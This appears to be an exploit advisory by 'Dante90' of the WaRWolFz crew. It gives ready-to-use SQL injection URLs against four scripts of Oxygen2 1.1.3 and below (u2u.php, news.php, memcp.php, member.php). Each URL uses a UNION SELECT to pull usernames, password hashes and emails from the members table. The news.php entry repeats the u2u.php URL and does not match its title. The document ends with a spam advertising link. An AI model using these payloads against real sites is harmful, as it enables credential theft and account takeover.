Oxygen2 versions 1.1.3 and below suffer from remote SQL injection vulnerabilities in u2u.php, news.php, member.php, and memcp.php.
4dd7ca3c243bf88237dc4a5e677c1845dbcc22ca138875262fbbc4d71e433d21
[0-Day] SQL Injection Oxygen2 -= 1.1.3 (u2u.php) By Dante90
######################################################################################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] SQL Injection Oxygen2 <= 1.1.3 (u2u.php) By Dante90 #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# #
######################################################################################
[0-Day] SQL Injection Oxygen2 <= 1.1.3 (u2u.php) By Dante90
[code]
http://www.victime_site.org/WaRWolFz/u2u.php?action=view&folder=inbox&u2uid=-1 ' UNION SELECT 1,password,username,4,5,email,7,8 FROM o2_members WHERE uid = 1/*&user=Dante90
[/code]
Dante90
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[0-Day] SQL Injection Oxygen2 -= 1.1.3 (news.php) By Dante90
######################################################################################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] SQL Injection Oxygen2 <= 1.1.3 (news.php) By Dante90 #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# #
######################################################################################
[0-Day] SQL Injection Oxygen2 <= 1.1.3 (news.php) By Dante90
[code]
http://www.victime_site.org/WaRWolFz/u2u.php?action=view&folder=inbox&u2uid=-1 ' UNION SELECT 1,2,3,username,password,6,7 FROM o2_members WHERE uid = 1/*
[/code]
Dante90
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[0-Day] SQL Injection Oxygen2 -= 1.1.3 (memcp.php) By Dante90
######################################################################################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] SQL Injection Oxygen2 <= 1.1.3 (memcp.php) By Dante90 #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# #
######################################################################################
[0-Day] SQL Injection Oxygen2 <= 1.1.3 (memcp.php) By Dante90
[code]
http://www.victime_site.org/WaRWolFz/memcp.php?action=avatargal&user=-1 ' UNION SELECT 1,CONCAT(status,CHAR(32,58,32),username,CHAR(32,58,32),password,CHAR(32,58,32),email) FROM o2_members WHERE uid = 1/*
[/code]
Dante90
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[0-Day] SQL Injection Oxygen2 -= 1.1.3 (member.php) By Dante90
######################################################################################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] SQL Injection Oxygen2 <= 1.1.3 (member.php) By Dante90 #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# #
######################################################################################
[0-Day] SQL Injection Oxygen2 <= 1.1.3 (member.php) By Dante90
[code]
http://www.victime_site.org/WaRWolFz/member.php?action=viewpro&member=-1 ' UNION SELECT uid,username,password,regdate,postnum,site,aim,status,location,bio,sig,sightml,showemail,timeoffset,icq,avatar,yahoo,customstatus,theme,bday,bmonth,byear,langfile,tpp,ppp,newsletter,regip,timeformat,msn,dateformat,ignoreu2u,lastvisit,rating,realname,firstname,emailnotify,profileviews,u2upopup,hidden,hidesig,hideavatar,logintime,readtopics,44,45,46 FROM o2_members WHERE username='Dante90'/*
[/code]
Dante90
_________________________________________________________________
Scopri le keyword piĆ¹ cercate della settimana!
http://clk.atdmt.com/GBL/go/136430524/direct/01/